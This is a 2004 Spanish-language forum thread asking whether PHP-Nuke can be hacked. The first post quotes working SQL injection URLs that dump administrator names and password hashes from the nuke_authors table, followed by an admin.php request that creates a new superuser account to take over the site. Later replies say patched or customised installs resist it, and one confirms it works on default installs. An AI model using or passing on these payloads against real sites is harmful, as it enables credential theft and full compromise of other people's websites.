Es posible romper la seguridad de PHPNuke?

Mickel · #1 (**permalink**) 15/06/2004, 20:21

Encontre esta informacion

Cita:

En primer lugar, se puede obtener una sentencia SQL con el password del administrador principal del sitio web con esta orden:

/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_a uthors

Tambien se pueden sacar más datos asi:

/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,p wd,url,url,10000,name%20FROM%20nuke_authors/*

Una vez obtenida la password del usuario ROOT, podemos crearnos una cuenta de superusuario:

/admin.php?op=AddAuthor&add_radminsuper=1&add_name= TLTLTL&add_aid=TLTLTL&add_
[email protected]&add_pwd=12345&admin=

Una vez tenemos una cuenta con dichos privilegios, el site es nuestro y podemos hacer lo que queramos.

Alguien sabe que tan cierto es? No me animo a probarlo...

#2 (**permalink**) 16/06/2004, 10:30

pues no se si precisamente con ese codigo precisamente podrias romper la seguridad del php-nuke yo te puedo decir que en el mio no podrias entrar con ese codigo ni en el de cualquiera que se preocupe lo mas minimo de estar al dia de los parches de seguridad que salen, el php-nuke no es mas seguro o inseguro que otro sitema prefabricado solo que al ser el mas conocido se saben mas pero en cualquier sitema es posible romper la seguridad llamese php-nuke,vbulletin,invision.phpbb etc etc un saludo

SidV · #3 (**permalink**) 19/06/2004, 18:38

Cita:

Es posible romper la seguridad de PHPNuke?

:? De que seguridad estamos hablando ?
Si, ese code es para quebrar la seguridad de los que instalaron nuke predeterminadamente como "dicen" que se debe instalar.
La viveza de un webmaster esta en crear cosas personalizadas, entocnes hagarras nuke como base e inventas un ambiente nuevo, entonces los lammers que se dedican a jakear portales nukes se creen que vos tenes un nuke como cualkier otro, cuando en realidad nada que ver :)

Salu2